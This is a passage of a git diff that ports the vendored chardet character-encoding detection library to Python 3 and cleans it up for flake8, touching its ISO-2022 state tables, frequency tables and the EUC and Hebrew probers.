-2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022JP_cls = ( +2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,2,2, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,7,0,0,0, # 20 - 27 +3,0,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +6,0,4,0,8,0,0,0, # 40 - 47 +0,9,5,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022JP_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f -eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 -eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f -eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f -eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 +ISO2022JP_st = ( +eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 +eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 +eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f +eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 +eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f +eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f +eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 ) ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0) @@ -188,47 +188,47 @@ ISO2022JPSMModel = {'classTable': ISO2022JP_cls, 'charLenTable': ISO2022JPCharLenTable, 'name': "ISO-2022-JP"} -ISO2022KR_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,3,0,0,0, # 20 - 27 -0,4,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,5,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022KR_cls = ( +2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,3,0,0,0, # 20 - 27 +0,4,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,5,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022KR_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 -eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f -eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 +ISO2022KR_st = ( +eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f +eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 +eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f +eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 ) ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0) @@ -238,3 +238,5 @@ ISO2022KRSMModel = {'classTable': ISO2022KR_cls, 'stateTable': ISO2022KR_st, 'charLenTable': ISO2022KRCharLenTable, 'name': "ISO-2022-KR"} + +# flake8: noqa diff --git a/thirdparty/chardet/eucjpprober.py b/thirdparty/chardet/eucjpprober.py index faa5cb58d..8e64fdcc2 100644 --- a/thirdparty/chardet/eucjpprober.py +++ b/thirdparty/chardet/eucjpprober.py @@ -13,25 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCJPDistributionAnalysis -from jpcntx import EUCJPContextAnalysis -from mbcssm import EUCJPSMModel +import sys +from . import constants +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCJPDistributionAnalysis +from .jpcntx import EUCJPContextAnalysis +from .mbcssm import EUCJPSMModel + class EUCJPProber(MultiByteCharSetProber): def __init__(self): @@ -50,31 +51,35 @@ class EUCJPProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): + # PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] self._mContextAnalyzer.feed(self._mLastChar, charLen) self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen) - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) + self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mContextAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/euckrfreq.py b/thirdparty/chardet/euckrfreq.py index 1463fa1d8..a179e4c21 100644 --- a/thirdparty/chardet/euckrfreq.py +++ b/thirdparty/chardet/euckrfreq.py @@ -592,3 +592,5 @@ EUCKRCharToFreqOrder = ( \ 8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719, 8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735, 8736,8737,8738,8739,8740,8741) + +# flake8: noqa diff --git a/thirdparty/chardet/euckrprober.py b/thirdparty/chardet/euckrprober.py index bd697ebf3..5982a46b6 100644 --- a/thirdparty/chardet/euckrprober.py +++ b/thirdparty/chardet/euckrprober.py @@ -13,22 +13,23 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCKRDistributionAnalysis -from mbcssm import EUCKRSMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCKRDistributionAnalysis +from .mbcssm import EUCKRSMModel + class EUCKRProber(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/euctwfreq.py b/thirdparty/chardet/euctwfreq.py index c05720950..576e7504d 100644 --- a/thirdparty/chardet/euctwfreq.py +++ b/thirdparty/chardet/euctwfreq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -26,8 +26,8 @@ ######################### END LICENSE BLOCK ######################### # EUCTW frequency table -# Converted from big5 work -# by Taiwan's Mandarin Promotion Council +# Converted from big5 work +# by Taiwan's Mandarin Promotion Council # # 128 --> 0.42261 @@ -38,15 +38,15 @@ # # Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98 # Random Distribution Ration = 512/(5401-512)=0.105 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75 -# Char to FreqOrder table , +# Char to FreqOrder table , EUCTW_TABLE_SIZE = 8102 -EUCTWCharToFreqOrder = ( \ +EUCTWCharToFreqOrder = ( 1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742 3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758 1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774 @@ -424,3 +424,5 @@ EUCTWCharToFreqOrder = ( \ 8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710 8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726 8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742 + +# flake8: noqa diff --git a/thirdparty/chardet/euctwprober.py b/thirdparty/chardet/euctwprober.py index b073f134f..fe652fe37 100644 --- a/thirdparty/chardet/euctwprober.py +++ b/thirdparty/chardet/euctwprober.py @@ -25,10 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCTWDistributionAnalysis -from mbcssm import EUCTWSMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCTWDistributionAnalysis +from .mbcssm import EUCTWSMModel class EUCTWProber(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/gb2312freq.py b/thirdparty/chardet/gb2312freq.py index 7a4d5a1b3..1238f510f 100644 --- a/thirdparty/chardet/gb2312freq.py +++ b/thirdparty/chardet/gb2312freq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -36,14 +36,14 @@ # # Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79 # Random Distribution Ration = 512 / (3755 - 512) = 0.157 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9 GB2312_TABLE_SIZE = 3760 -GB2312CharToFreqOrder = ( \ +GB2312CharToFreqOrder = ( 1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205, 2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842, 2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409, @@ -469,3 +469,4 @@ GB2312CharToFreqOrder = ( \ 5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978, 4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767) +# flake8: noqa diff --git a/thirdparty/chardet/gb2312prober.py b/thirdparty/chardet/gb2312prober.py index 91eb3925a..0325a2d86 100644 --- a/thirdparty/chardet/gb2312prober.py +++ b/thirdparty/chardet/gb2312prober.py @@ -25,10 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import GB2312DistributionAnalysis -from mbcssm import GB2312SMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import GB2312DistributionAnalysis +from .mbcssm import GB2312SMModel class GB2312Prober(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/hebrewprober.py b/thirdparty/chardet/hebrewprober.py index 442c0bf2b..ba225c5ef 100644 --- a/thirdparty/chardet/hebrewprober.py +++ b/thirdparty/chardet/hebrewprober.py @@ -13,20 +13,21 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetprober import CharSetProber -import constants +from .charsetprober import CharSetProber +from .constants import eNotMe, eDetecting +from .compat import wrap_ord # This prober doesn't actually recognize a language or a charset. # It is a helper prober for the use of the Hebrew model probers @@ -35,40 +36,40 @@ import constants # # Four main charsets exist in Hebrew: # "ISO-8859-8" - Visual Hebrew -# "windows-1255" - Logical Hebrew +# "windows-1255" - Logical Hebrew # "ISO-8859-8-I" - Logical Hebrew # "x-mac-hebrew" - ?? Logical Hebrew ?? # # Both "ISO" charsets use a completely identical set of code points, whereas -# "windows-1255" and "x-mac-hebrew" are two different proper supersets of +# "windows-1255" and "x-mac-hebrew" are two different proper supersets of # these code points. windows-1255 defines additional characters in the range -# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific +# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific # diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6. -# x-mac-hebrew defines similar additional code points but with a different +# x-mac-hebrew defines similar additional code points but with a different # mapping. # -# As far as an average Hebrew text with no diacritics is concerned, all four -# charsets are identical with respect to code points. Meaning that for the -# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters +# As far as an average Hebrew text with no diacritics is concerned, all four +# charsets are identical with respect to code points. Meaning that for the +# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters # (including final letters). # # The dominant difference between these charsets is their directionality. # "Visual" directionality means that the text is ordered as if the renderer is -# not aware of a BIDI rendering algorithm. The renderer sees the text and -# draws it from left to right. The text itself when ordered naturally is read +# not aware of a BIDI rendering algorithm. The renderer sees the text and +# draws it from left to right. The text itself when ordered naturally is read # backwards. A buffer of Visual Hebrew generally looks like so: # "[last word of first line spelled backwards] [whole line ordered backwards -# and spelled backwards] [first word of first line spelled backwards] +# and spelled backwards] [first word of first line spelled backwards] # [end of line] [last word of second line] ... etc' " # adding punctuation marks, numbers and English text to visual text is # naturally also "visual" and from left to right. -# +# # "Logical" directionality means the text is ordered "naturally" according to -# the order it is read. It is the responsibility of the renderer to display -# the text from right to left. A BIDI algorithm is used to place general +# the order it is read. It is the responsibility of the renderer to display +# the text from right to left. A BIDI algorithm is used to place general # punctuation marks, numbers and English text in the text. # -# Texts in x-mac-hebrew are almost impossible to find on the Internet. From +# Texts in x-mac-hebrew are almost impossible to find on the Internet. From # what little evidence I could find, it seems that its general directionality # is Logical. # @@ -76,17 +77,17 @@ import constants # charsets: # Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are # backwards while line order is natural. For charset recognition purposes -# the line order is unimportant (In fact, for this implementation, even +# the line order is unimportant (In fact, for this implementation, even # word order is unimportant). # Logical Hebrew - "windows-1255" - normal, naturally ordered text. # -# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be +# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be # specifically identified. # "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew # that contain special punctuation marks or diacritics is displayed with # some unconverted characters showing as question marks. This problem might # be corrected using another model prober for x-mac-hebrew. Due to the fact -# that x-mac-hebrew texts are so rare, writing another model prober isn't +# that x-mac-hebrew texts are so rare, writing another model prober isn't # worth the effort and performance hit. # #### The Prober #### @@ -126,28 +127,31 @@ import constants # charset identified, either "windows-1255" or "ISO-8859-8". # windows-1255 / ISO-8859-8 code points of interest -FINAL_KAF = '\xea' -NORMAL_KAF = '\xeb' -FINAL_MEM = '\xed' -NORMAL_MEM = '\xee' -FINAL_NUN = '\xef' -NORMAL_NUN = '\xf0' -FINAL_PE = '\xf3' -NORMAL_PE = '\xf4' -FINAL_TSADI = '\xf5' -NORMAL_TSADI = '\xf6' +FINAL_KAF = 0xea +NORMAL_KAF = 0xeb +FINAL_MEM = 0xed +NORMAL_MEM = 0xee +FINAL_NUN = 0xef +NORMAL_NUN = 0xf0 +FINAL_PE = 0xf3 +NORMAL_PE = 0xf4 +FINAL_TSADI = 0xf5 +NORMAL_TSADI = 0xf6 # Minimum Visual vs Logical final letter score difference. -# If the difference is below this, don't rely solely on the final letter score distance. +# If the difference is below this, don't rely solely on the final letter score +# distance. MIN_FINAL_CHAR_DISTANCE = 5 # Minimum Visual vs Logical model score difference. -# If the difference is below this, don't rely at all on the model score distance. +# If the difference is below this, don't rely at all on the model score +# distance. MIN_MODEL_DISTANCE = 0.01 VISUAL_HEBREW_NAME = "ISO-8859-8" LOGICAL_HEBREW_NAME = "windows-1255" + class HebrewProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -159,8 +163,8 @@ class HebrewProber(CharSetProber): self._mFinalCharLogicalScore = 0 self._mFinalCharVisualScore = 0 # The two last characters seen in the previous buffer, - # mPrev and mBeforePrev are initialized to space in order to simulate a word - # delimiter at the beginning of the data + # mPrev and mBeforePrev are initialized to space in order to simulate + # a word delimiter at the beginning of the data self._mPrev = ' ' self._mBeforePrev = ' ' # These probers are owned by the group prober. @@ -170,49 +174,52 @@ class HebrewProber(CharSetProber): self._mVisualProber = visualProber def is_final(self, c): - return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI] + return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, + FINAL_TSADI] def is_non_final(self, c): - # The normal Tsadi is not a good Non-Final letter due to words like - # 'lechotet' (to chat) containing an apostrophe after the tsadi. This - # apostrophe is converted to a space in FilterWithoutEnglishLetters causing - # the Non-Final tsadi to appear at an end of a word even though this is not - # the case in the original text. - # The letters Pe and Kaf rarely display a related behavior of not being a - # good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for - # example legally end with a Non-Final Pe or Kaf. However, the benefit of - # these letters as Non-Final letters outweighs the damage since these words - # are quite rare. - return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] + # The normal Tsadi is not a good Non-Final letter due to words like + # 'lechotet' (to chat) containing an apostrophe after the tsadi. This + # apostrophe is converted to a space in FilterWithoutEnglishLetters + # causing the Non-Final tsadi to appear at an end of a word even + # though this is not the case in the original text. + # The letters Pe and Kaf rarely display a related behavior of not being + # a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' + # for example legally end with a Non-Final Pe or Kaf. However, the + # benefit of these letters as Non-Final letters outweighs the damage + # since these words are quite rare. + return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] def feed(self, aBuf): # Final letter analysis for logical-visual decision. - # Look for evidence that the received buffer is either logical Hebrew or - # visual Hebrew. + # Look for evidence that the received buffer is either logical Hebrew + # or visual Hebrew. # The following cases are checked: - # 1) A word longer than 1 letter, ending with a final letter. This is an - # indication that the text is laid out "naturally" since the final letter - # really appears at the end. +1 for logical score. - # 2) A word longer than 1 letter, ending with a Non-Final letter. In normal - # Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with - # the Non-Final form of that letter. Exceptions to this rule are mentioned - # above in isNonFinal(). This is an indication that the text is laid out - # backwards. +1 for visual score - # 3) A word longer than 1 letter, starting with a final letter. Final letters - # should not appear at the beginning of a word. This is an indication that - # the text is laid out backwards. +1 for visual score. - # - # The visual score and logical score are accumulated throughout the text and - # are finally checked against each other in GetCharSetName(). - # No checking for final letters in the middle of words is done since that case - # is not an indication for either Logical or Visual text. - # - # We automatically filter out all 7-bit characters (replace them with spaces) - # so the word boundary detection works properly. [MAP] + # 1) A word longer than 1 letter, ending with a final letter. This is + # an indication that the text is laid out "naturally" since the + # final letter really appears at the end. +1 for logical score. + # 2) A word longer than 1 letter, ending with a Non-Final letter. In + # normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, + # should not end with the Non-Final form of that letter. Exceptions + # to this rule are mentioned above in isNonFinal(). This is an + # indication that the text is laid out backwards. +1 for visual + # score + # 3) A word longer than 1 letter, starting with a final letter. Final + # letters should not appear at the beginning of a word. This is an + # indication that the text is laid out backwards. +1 for visual + # score. + # + # The visual score and logical score are accumulated throughout the + # text and are finally checked against each other in GetCharSetName(). + # No checking for final letters in the middle of words is done since + # that case is not an indication for either Logical or Visual text. + # + # We automatically filter out all 7-bit characters (replace them with + # spaces) so the word boundary detection works properly. [MAP] - if self.get_state() == constants.eNotMe: + if self.get_state() == eNotMe: # Both model probers say it's not them. No reason to continue. - return constants.eNotMe + return eNotMe aBuf = self.filter_high_bit_only(aBuf) @@ -220,23 +227,27 @@ class HebrewProber(CharSetProber): if cur == ' ': # We stand on a space - a word just ended if self._mBeforePrev != ' ': - # next-to-last char was not a space so self._mPrev is not a 1 letter word + # next-to-last char was not a space so self._mPrev is not a + # 1 letter word if self.is_final(self._mPrev): # case (1) [-2:not space][-1:final letter][cur:space] self._mFinalCharLogicalScore += 1 elif self.is_non_final(self._mPrev): - # case (2) [-2:not space][-1:Non-Final letter][cur:space] + # case (2) [-2:not space][-1:Non-Final letter][ + # cur:space] self._mFinalCharVisualScore += 1 else: # Not standing on a space - if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '): + if ((self._mBeforePrev == ' ') and + (self.is_final(self._mPrev)) and (cur != ' ')): # case (3) [-2:space][-1:final letter][cur:not space] self._mFinalCharVisualScore += 1 self._mBeforePrev = self._mPrev self._mPrev = cur - # Forever detecting, till the end or until both model probers return eNotMe (handled above) - return constants.eDetecting + # Forever detecting, till the end or until both model probers return + # eNotMe (handled above) + return eDetecting def get_charset_name(self): # Make the decision: is it Logical or Visual? @@ -248,22 +259,25 @@ class HebrewProber(CharSetProber): return VISUAL_HEBREW_NAME # It's not dominant enough, try to rely on the model scores instead. - modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence() + modelsub = (self._mLogicalProber.get_confidence() + - self._mVisualProber.get_confidence()) if modelsub > MIN_MODEL_DISTANCE: return LOGICAL_HEBREW_NAME if modelsub < -MIN_MODEL_DISTANCE: return VISUAL_HEBREW_NAME - # Still no good, back to final letter distance, maybe it'll save the day. + # Still no good, back to final letter distance, maybe it'll save the + # day. if finalsub < 0.0: return VISUAL_HEBREW_NAME - # (finalsub > 0 - Logical) or (don't know what to do) default to Logical. + # (finalsub > 0 - Logical) or (don't know what to do) default to + # Logical. return LOGICAL_HEBREW_NAME def get_state(self): # Remain active as long as any of the model probers are active. - if (self._mLogicalProber.get_state() == constants.eNotMe) and \ - (self._mVisualProber.get_state() == constants.eNotMe): - return constants.eNotMe - return constants.eDetecting + if (self._mLogicalProber.get_state() == eNotMe) and \ + (self._mVisualProber.get_state() == eNotMe): + return eNotMe + return eDetecting diff --git a/thirdparty/chardet/jisfreq.py b/thirdparty/chardet/jisfreq.py index 5fe4a5c3f..064345b08 100644 --- a/thirdparty/chardet/jisfreq.py +++ b/thirdparty/chardet/jisfreq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -28,7 +28,7 @@ # Sampling from about 20M text materials include literature and computer technology # # Japanese frequency table, applied to both S-JIS and EUC-JP -# They are sorted in order. +# They are sorted in order. # 128 --> 0.77094 # 256 --> 0.85710 @@ -38,15 +38,15 @@ # # Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58 # Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191 -# -# Typical Distribution Ratio, 25% of IDR +# +# Typical Distribution Ratio, 25% of IDR 